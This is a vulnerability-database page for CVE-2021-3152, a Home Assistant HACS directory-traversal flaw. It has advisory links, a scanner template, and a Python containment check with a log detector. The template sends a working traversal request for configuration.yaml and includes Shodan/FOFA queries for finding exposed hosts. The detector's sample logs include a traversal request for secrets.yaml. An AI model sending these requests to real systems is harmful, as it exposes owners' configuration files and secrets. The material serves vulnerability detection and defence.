| Title | Published | Views | Family |
|---|---|---|---|
| [ASA-202101-44] home-assistant: information disclosure | 29 Jan 2021 00:00 | – | archlinux |
| CVE-2021-3152 | 22 Apr 2026 08:43 | – | circl |
| Home Assistant Path Traversal Vulnerability | 26 Jan 2021 00:00 | – | cnnvd |
| Home Assistant Directory Traversal Vulnerability | 29 Jan 2021 00:00 | – | cnvd |
| CVE-2021-3152 | 21 Jan 2021 15:10 | – | cve |
| CVE-2021-3152 | 21 Jan 2021 15:10 | – | cvelist |
| CVE-2021-3152 | 26 Jan 2021 18:16 | – | nvd |
| Home Assistant < 2021.1.3 Path Traversal Vulnerability | 15 Jun 2023 00:00 | – | openvas |
| Directory traversal | 26 Jan 2021 18:16 | – | prion |
| PT-2021-19401 | 21 Jan 2021 00:00 | – | ptsecurity |

```yaml
id: CVE-2021-3152

info:
  name: Home Assistant HACS - Local File Inclusion
  author: DhiyaneshDk
  severity: high
  description: |
    Home Assistant before 2021.1.3 lacks a protection layer against directory-traversal attacks in custom integrations, letting attackers access arbitrary files. Exploitation requires the attacker to deploy a malicious custom integration.
  impact: |
    Attackers can access sensitive files on the system, potentially leading to information disclosure or further system compromise.
  remediation: Update to version 2021.1.3 or later to include protection against directory traversal in custom integrations.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3152
    - https://lyghtnox.gitlab.io/posts/hacs-exploit/
    - https://www.home-assistant.io/blog/2021/01/22/security-disclosure/
    - https://github.com/hacs/integration/commit/f2b7cb711e41a94b81610f6ff96ea314e9879114
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-3152
    epss-score: 0.02231
    epss-percentile: 0.80549
    cwe-id: CWE-22
  metadata:
    verified: false
    max-request: 1
    vendor: hacs
    product: integration
    shodan-query: title:"Home Assistant"
    fofa-query: title="Home Assistant"
  tags: cve,cve2021,hacs,homeassistant,lfi

http:
  - raw:
      - |
        GET /hacsfiles/../../configuration.yaml HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "default_config:"
          - "homeassistant:"
        condition: or

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c6ea9a338629251120891052e765d09a9ede44f66d0279a2de7b05c836ab73c6022100dc0d4815a02683c572822a02936fa070d394f772226234f5144ae7429817eedf:922c64590222798bb761d5b6d8e72950
```
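The template above probes for the missing "protection layer" the description mentions: a static-file handler under `/hacsfiles/` that does not confine resolved paths to its own directory. The example below is added here and is not HACS's or Home Assistant's code; it shows the containment check such a handler needs (percent-decode, normalize, then verify the result is still inside the served directory) and reuses that check as a detector over constructed access-log lines, flagging traversal requests that received a 200, i.e. ones an unpatched server actually served. `HACSFILES_ROOT`, the log format and the sample lines are assumptions made for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed directory that /hacsfiles/ is served from (constructed value for the
# example, not a real installation path).
HACSFILES_ROOT = "/config/www/community"
URL_PREFIX = "/hacsfiles/"


def safe_resolve(url_path, root=HACSFILES_ROOT):
    """Map a URL path under /hacsfiles/ to a filesystem path inside `root`.

    Returns None if the path is not under the prefix or would escape `root`
    after decoding and normalization (the directory-traversal case).
    """
    decoded = unquote(url_path.split("?", 1)[0])  # drop query, decode %2e%2e etc.
    if not decoded.startswith(URL_PREFIX):
        return None
    rel = decoded[len(URL_PREFIX):]
    # Join first, normalize second: normalizing the relative part on its own
    # would silently collapse leading ".." segments and hide the escape.
    candidate = posixpath.normpath(posixpath.join(root, rel))
    # posixpath.join discards `root` if `rel` is absolute, so this single
    # containment test also rejects "/hacsfiles//etc/passwd"-style inputs.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


# Constructed sample access-log lines (common log format); not from any real host.
LOG_LINES = [
    '10.0.0.5 - - [26/Jan/2021:18:16:01 +0000] "GET /hacsfiles/hacs/frontend.js HTTP/1.1" 200 4123',
    '10.0.0.9 - - [26/Jan/2021:18:16:07 +0000] "GET /hacsfiles/../../configuration.yaml HTTP/1.1" 200 512',
    '10.0.0.9 - - [26/Jan/2021:18:16:09 +0000] "GET /hacsfiles/%2e%2e/%2e%2e/secrets.yaml HTTP/1.1" 200 300',
    '10.0.0.7 - - [26/Jan/2021:18:16:12 +0000] "GET /api/states HTTP/1.1" 401 0',
]

REQUEST_RE = re.compile(r'"(?:GET|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def find_traversal_hits(lines):
    """Return (path, status) for /hacsfiles/ requests the containment check rejects.

    A rejected path with status 200 means the server served a file outside
    its static directory, which is the behaviour the fixed version prevents.
    """
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path, status = m.group(1), int(m.group(2))
        if path.startswith(URL_PREFIX) and safe_resolve(path) is None:
            hits.append((path, status))
    return hits


if __name__ == "__main__":
    for path, status in find_traversal_hits(LOG_LINES):
        print(f"traversal request {path!r} answered with HTTP {status}")
```

The check decodes exactly once, so a doubly encoded `%252e%252e` stays a literal file name under the root rather than becoming `..`; it is then rejected or served by the filesystem as an ordinary (nonexistent) file, which is the intended behaviour. Run against real logs, any hit with a 2xx status should be treated as confirmed file disclosure rather than as a blocked attempt.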